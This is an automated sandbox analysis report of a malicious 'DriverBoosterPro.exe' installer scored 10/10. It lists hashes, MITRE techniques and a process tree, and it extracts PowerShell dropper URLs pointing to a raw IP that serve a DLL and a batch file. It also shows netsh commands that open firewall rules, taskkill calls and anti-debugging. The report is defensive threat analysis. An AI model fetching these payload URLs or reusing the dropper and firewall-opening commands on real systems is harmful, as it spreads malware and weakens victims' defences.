10b956449191907929102ae12fdf6a4c51ba5a0aa168259608f502d1a70c931c

Analysis

max time kernel
148s
max time network
123s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
11-11-2024 00:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

DriverBoosterPro.exe
Size

30.8MB
MD5

0d53802cb56260bfe67619aabfa4974f
SHA1

21375855ea1f0cf5fe8147a70031a44a626e0b07
SHA256

24f24ab0484ba98c79a49459178ea40ca2fecc54100cd913c7eff730be962290
SHA512

25c8930c2ec97a55d715ce5990c0ea6f1b3b266fbc20a9d012c2a7ead0d06345e4dcb85fac97ac678ab7d261e5241a5922841966df63ba8ae51b326af642c8b7
SSDEEP

393216:01NpF9ID9b3Mj4sVC3Z+dV+fOcaZ5xlux+Gd3nHGaTamTDWeMAQtJxKP+:0CD5FsCc44GZHrTFSFJKP+

Score

10^/10

discovery evasion execution persistence privilege_escalation

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://135.181.123.26/sccp32.dll

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://135.181.123.26/rundll32.bat

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
4	1136	powershell.exe
6	1916	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2704	powershell.exe
1136	powershell.exe
1916	powershell.exe

Modifies Windows Firewall 2 TTPs 6 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
2448	netsh.exe
2752	netsh.exe
2204	netsh.exe
2748	netsh.exe
2616	netsh.exe
2816	netsh.exe

ACProtect 1.3x - 1.4x DLL software 1 IoCs

Detects file using ACProtect software.

resource	yara_rule
behavioral1/files/0x000500000001a4db-499.dat	acprotect

Executes dropped EXE 15 IoCs

pid	Process
2324	DriverBoosterPro.tmp
2452	Driver.Booster.10.0.0.65.exe
444	Driver.Booster.10.0.0.65.tmp
348	HWiNFO.exe
1652	DriverBooster.exe
2428	DriverBooster.exe
1320	HWiNFO.exe
1508	Manta.exe
2896	AutoUpdate.exe
2660	Manta.exe
2204	RttHlp.exe
2652	Manta.exe
1756	RttHlp.exe
2016	SetupHlp.exe
1372	rma.exe

Loads dropped DLL 64 IoCs

pid	Process
2176	DriverBoosterPro.exe
2324	DriverBoosterPro.tmp
2324	DriverBoosterPro.tmp
2452	Driver.Booster.10.0.0.65.exe
444	Driver.Booster.10.0.0.65.tmp
444	Driver.Booster.10.0.0.65.tmp
444	Driver.Booster.10.0.0.65.tmp
444	Driver.Booster.10.0.0.65.tmp
444	Driver.Booster.10.0.0.65.tmp
444	Driver.Booster.10.0.0.65.tmp
444	Driver.Booster.10.0.0.65.tmp
444	Driver.Booster.10.0.0.65.tmp
444	Driver.Booster.10.0.0.65.tmp
1652	DriverBooster.exe
348	HWiNFO.exe
1652	DriverBooster.exe
1652	DriverBooster.exe
1652	DriverBooster.exe
1652	DriverBooster.exe
1652	DriverBooster.exe
1652	DriverBooster.exe
1652	DriverBooster.exe
1652	DriverBooster.exe
1652	DriverBooster.exe
1652	DriverBooster.exe
1652	DriverBooster.exe
1652	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
1508	Manta.exe
1508	Manta.exe
1508	Manta.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2896	AutoUpdate.exe
2896	AutoUpdate.exe
2896	AutoUpdate.exe
2896	AutoUpdate.exe
2896	AutoUpdate.exe
2896	AutoUpdate.exe
2896	AutoUpdate.exe
1508	Manta.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2660	Manta.exe
2660	Manta.exe
2660	Manta.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Suspicious use of NtSetInformationThreadHideFromDebugger 10 IoCs

pid	Process
1652	DriverBooster.exe
2428	DriverBooster.exe
1508	Manta.exe
2896	AutoUpdate.exe
2660	Manta.exe
2204	RttHlp.exe
2652	Manta.exe
1756	RttHlp.exe
2016	SetupHlp.exe
1372	rma.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\IObit\Driver Booster\is-2N9RU.tmp	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Language\is-F0244.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\is-87UHI.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\is-DR02Q.tmp	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\Update\Update.ini	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\is-I5JQ2.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Language\is-5UCJB.tmp	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\PowerMgr.dll	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Database\Scan\is-0F3JC.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\is-LJC64.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\is-8PMR0.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Update\Freeware.ini.tmp\is-TI9OF.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\is-4UC2C.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\DpInst\x86\is-FERCT.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-5BS8Q.tmp	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\CareScan.exe	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\ScanData\scan.dat	DriverBooster.exe
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\Scheduler.exe	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\DetectWave.dll	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\rma.exe	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\DrvInstall\is-97QPN.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Language\is-0M7F6.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Skin\is-QNI95.tmp	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\libssl-1_1.dll	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\Update\Update.ini.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Language\is-A63C8.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\is-5H49D.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-HFTPF.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\is-DOO6D.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\is-HFP22.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\is-GL41A.tmp	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\Uninstall\unins000.dat	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\RttHlp.exe	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Language\is-GTH05.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-RGQ2J.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-7LHPL.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-DVA54.tmp	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\IsuScan.exe	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Boost\is-K3M9Q.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Boost\is-1DP10.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\DrvInstall\is-JFEF5.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\is-U71TM.tmp	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\Update\dbxmas.exe\dbxmas.exe	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\Update\Freeware.ini.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Language\is-ASRAL.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Language\is-8K07M.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\is-4FV06.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\version_IObitDel.dll	DriverBooster.exe
File created	C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-JULD9.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-PREUA.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-G2EH7.tmp	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\SysRest.dll	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\Update\xmas.exe\xmas.exe	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\LocalData\is-HP4N0.tmp	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\ScanDisp.exe	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-795BH.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Icons\Apps\is-NDO89.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\is-2CAPK.tmp	Driver.Booster.10.0.0.65.tmp
File opened for modification	C:\Program Files (x86)\IObit\Driver Booster\ScanData\scan.dat	DriverBooster.exe
File created	C:\Program Files (x86)\IObit\Driver Booster\DpInst\x64\is-EFH9U.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\ErrCodeSpec\is-5BNE4.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Skin\is-NGG0E.tmp	Driver.Booster.10.0.0.65.tmp
File created	C:\Program Files (x86)\IObit\Driver Booster\Update\Update.ini\is-IHGVJ.tmp	Driver.Booster.10.0.0.65.tmp

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 18 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 28 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	rma.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RttHlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Manta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Manta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DriverBooster.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HWiNFO.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Manta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SetupHlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DriverBoosterPro.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Driver.Booster.10.0.0.65.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Driver.Booster.10.0.0.65.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AutoUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DriverBooster.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RttHlp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	DriverBoosterPro.tmp
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	HWiNFO.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	DriverBooster.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	DriverBooster.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
3020	taskkill.exe
1060	taskkill.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

pid	Process
2324	DriverBoosterPro.tmp
2324	DriverBoosterPro.tmp
444	Driver.Booster.10.0.0.65.tmp
2704	powershell.exe
1136	powershell.exe
1916	powershell.exe
444	Driver.Booster.10.0.0.65.tmp
444	Driver.Booster.10.0.0.65.tmp
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
1508	Manta.exe
1508	Manta.exe
2896	AutoUpdate.exe
2896	AutoUpdate.exe
2896	AutoUpdate.exe
2660	Manta.exe
2660	Manta.exe
2204	RttHlp.exe
2204	RttHlp.exe
2652	Manta.exe
2652	Manta.exe
1756	RttHlp.exe
1756	RttHlp.exe
2016	SetupHlp.exe
2016	SetupHlp.exe
2016	SetupHlp.exe
2016	SetupHlp.exe
1372	rma.exe

Suspicious behavior: LoadsDriver 6 IoCs

pid	Process
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found
480	Process not Found

Suspicious use of AdjustPrivilegeToken 12 IoCs

description	pid	Process
Token: SeDebugPrivilege	2704	powershell.exe
Token: SeDebugPrivilege	1136	powershell.exe
Token: SeDebugPrivilege	1916	powershell.exe
Token: SeDebugPrivilege	3020	taskkill.exe
Token: SeLoadDriverPrivilege	348	HWiNFO.exe
Token: SeLoadDriverPrivilege	348	HWiNFO.exe
Token: SeLoadDriverPrivilege	348	HWiNFO.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: 33	2428	DriverBooster.exe
Token: SeIncBasePriorityPrivilege	2428	DriverBooster.exe
Token: 33	2428	DriverBooster.exe
Token: SeIncBasePriorityPrivilege	2428	DriverBooster.exe

Suspicious use of FindShellTrayWindow 6 IoCs

pid	Process
2324	DriverBoosterPro.tmp
444	Driver.Booster.10.0.0.65.tmp
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2896	AutoUpdate.exe

Suspicious use of SendNotifyMessage 4 IoCs

pid	Process
2428	DriverBooster.exe
2428	DriverBooster.exe
2428	DriverBooster.exe
2896	AutoUpdate.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2176 wrote to memory of 2324	2176	DriverBoosterPro.exe	30
PID 2176 wrote to memory of 2324	2176	DriverBoosterPro.exe	30
PID 2176 wrote to memory of 2324	2176	DriverBoosterPro.exe	30
PID 2176 wrote to memory of 2324	2176	DriverBoosterPro.exe	30
PID 2176 wrote to memory of 2324	2176	DriverBoosterPro.exe	30
PID 2176 wrote to memory of 2324	2176	DriverBoosterPro.exe	30
PID 2176 wrote to memory of 2324	2176	DriverBoosterPro.exe	30
PID 2324 wrote to memory of 2452	2324	DriverBoosterPro.tmp	31
PID 2324 wrote to memory of 2452	2324	DriverBoosterPro.tmp	31
PID 2324 wrote to memory of 2452	2324	DriverBoosterPro.tmp	31
PID 2324 wrote to memory of 2452	2324	DriverBoosterPro.tmp	31
PID 2324 wrote to memory of 2452	2324	DriverBoosterPro.tmp	31
PID 2324 wrote to memory of 2452	2324	DriverBoosterPro.tmp	31
PID 2324 wrote to memory of 2452	2324	DriverBoosterPro.tmp	31
PID 2452 wrote to memory of 444	2452	Driver.Booster.10.0.0.65.exe	32
PID 2452 wrote to memory of 444	2452	Driver.Booster.10.0.0.65.exe	32
PID 2452 wrote to memory of 444	2452	Driver.Booster.10.0.0.65.exe	32
PID 2452 wrote to memory of 444	2452	Driver.Booster.10.0.0.65.exe	32
PID 2452 wrote to memory of 444	2452	Driver.Booster.10.0.0.65.exe	32
PID 2452 wrote to memory of 444	2452	Driver.Booster.10.0.0.65.exe	32
PID 2452 wrote to memory of 444	2452	Driver.Booster.10.0.0.65.exe	32
PID 2324 wrote to memory of 2832	2324	DriverBoosterPro.tmp	33
PID 2324 wrote to memory of 2832	2324	DriverBoosterPro.tmp	33
PID 2324 wrote to memory of 2832	2324	DriverBoosterPro.tmp	33
PID 2324 wrote to memory of 2832	2324	DriverBoosterPro.tmp	33
PID 2832 wrote to memory of 2704	2832	cmd.exe	35
PID 2832 wrote to memory of 2704	2832	cmd.exe	35
PID 2832 wrote to memory of 2704	2832	cmd.exe	35
PID 2832 wrote to memory of 2704	2832	cmd.exe	35
PID 2832 wrote to memory of 1136	2832	cmd.exe	37
PID 2832 wrote to memory of 1136	2832	cmd.exe	37
PID 2832 wrote to memory of 1136	2832	cmd.exe	37
PID 2832 wrote to memory of 1136	2832	cmd.exe	37
PID 2832 wrote to memory of 1916	2832	cmd.exe	38
PID 2832 wrote to memory of 1916	2832	cmd.exe	38
PID 2832 wrote to memory of 1916	2832	cmd.exe	38
PID 2832 wrote to memory of 1916	2832	cmd.exe	38
PID 444 wrote to memory of 3020	444	Driver.Booster.10.0.0.65.tmp	39
PID 444 wrote to memory of 3020	444	Driver.Booster.10.0.0.65.tmp	39
PID 444 wrote to memory of 3020	444	Driver.Booster.10.0.0.65.tmp	39
PID 444 wrote to memory of 3020	444	Driver.Booster.10.0.0.65.tmp	39
PID 444 wrote to memory of 348	444	Driver.Booster.10.0.0.65.tmp	42
PID 444 wrote to memory of 348	444	Driver.Booster.10.0.0.65.tmp	42
PID 444 wrote to memory of 348	444	Driver.Booster.10.0.0.65.tmp	42
PID 444 wrote to memory of 348	444	Driver.Booster.10.0.0.65.tmp	42
PID 444 wrote to memory of 1652	444	Driver.Booster.10.0.0.65.tmp	43
PID 444 wrote to memory of 1652	444	Driver.Booster.10.0.0.65.tmp	43
PID 444 wrote to memory of 1652	444	Driver.Booster.10.0.0.65.tmp	43
PID 444 wrote to memory of 1652	444	Driver.Booster.10.0.0.65.tmp	43
PID 444 wrote to memory of 1060	444	Driver.Booster.10.0.0.65.tmp	44
PID 444 wrote to memory of 1060	444	Driver.Booster.10.0.0.65.tmp	44
PID 444 wrote to memory of 1060	444	Driver.Booster.10.0.0.65.tmp	44
PID 444 wrote to memory of 1060	444	Driver.Booster.10.0.0.65.tmp	44
PID 444 wrote to memory of 2448	444	Driver.Booster.10.0.0.65.tmp	46
PID 444 wrote to memory of 2448	444	Driver.Booster.10.0.0.65.tmp	46
PID 444 wrote to memory of 2448	444	Driver.Booster.10.0.0.65.tmp	46
PID 444 wrote to memory of 2448	444	Driver.Booster.10.0.0.65.tmp	46
PID 444 wrote to memory of 2752	444	Driver.Booster.10.0.0.65.tmp	49
PID 444 wrote to memory of 2752	444	Driver.Booster.10.0.0.65.tmp	49
PID 444 wrote to memory of 2752	444	Driver.Booster.10.0.0.65.tmp	49
PID 444 wrote to memory of 2752	444	Driver.Booster.10.0.0.65.tmp	49
PID 444 wrote to memory of 2204	444	Driver.Booster.10.0.0.65.tmp	51
PID 444 wrote to memory of 2204	444	Driver.Booster.10.0.0.65.tmp	51
PID 444 wrote to memory of 2204	444	Driver.Booster.10.0.0.65.tmp	51

C:\Users\Admin\AppData\Local\Temp\DriverBoosterPro.exe
"C:\Users\Admin\AppData\Local\Temp\DriverBoosterPro.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2176
- C:\Users\Admin\AppData\Local\Temp\is-GTDFP.tmp\DriverBoosterPro.tmp
  "C:\Users\Admin\AppData\Local\Temp\is-GTDFP.tmp\DriverBoosterPro.tmp" /SL5="$400E0,31312389,996352,C:\Users\Admin\AppData\Local\Temp\DriverBoosterPro.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2324
- - C:\Users\Admin\AppData\Local\Temp\is-MP2JM.tmp\Driver.Booster.10.0.0.65.exe
    "C:\Users\Admin\AppData\Local\Temp\is-MP2JM.tmp\Driver.Booster.10.0.0.65.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2452
  - - C:\Users\Admin\AppData\Local\Temp\is-586A2.tmp\Driver.Booster.10.0.0.65.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-586A2.tmp\Driver.Booster.10.0.0.65.tmp" /SL5="$5020A,29414238,361472,C:\Users\Admin\AppData\Local\Temp\is-MP2JM.tmp\Driver.Booster.10.0.0.65.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of FindShellTrayWindow
      Suspicious use of WriteProcessMemory
      PID:444
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "C:\Windows\System32\taskkill.exe" /f /im ScanWinUpd.exe
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:3020
    - - C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe
        
        "C:\Program Files (x86)\IObit\Driver Booster\HWiNFO\HWiNFO.exe" /brandname
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:348
    - - C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe
        
        "C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe" /skipuac
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        
        PID:1652
    - - C:\Windows\SysWOW64\taskkill.exe
        
        "taskkill" /f /im DriverBooster.exe
        5⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1060
    - - C:\Windows\SysWOW64\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver Booster" dir=out action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2448
    - - C:\Windows\SysWOW64\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver Booster" dir=in action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DriverBooster.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2752
    - - C:\Windows\SysWOW64\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Booster" dir=out action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DBDownloader.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2204
    - - C:\Windows\SysWOW64\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Booster" dir=in action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\DBDownloader.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:2748
    - - C:\Windows\SysWOW64\netsh.exe
        
        "C:\Windows\system32\netsh.exe" advfirewall firewall add rule name="Driver" dir=out action=Allow program="C:\Program Files (x86)\IObit\Driver Booster\AutoUpdate.exe" enable=yes
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
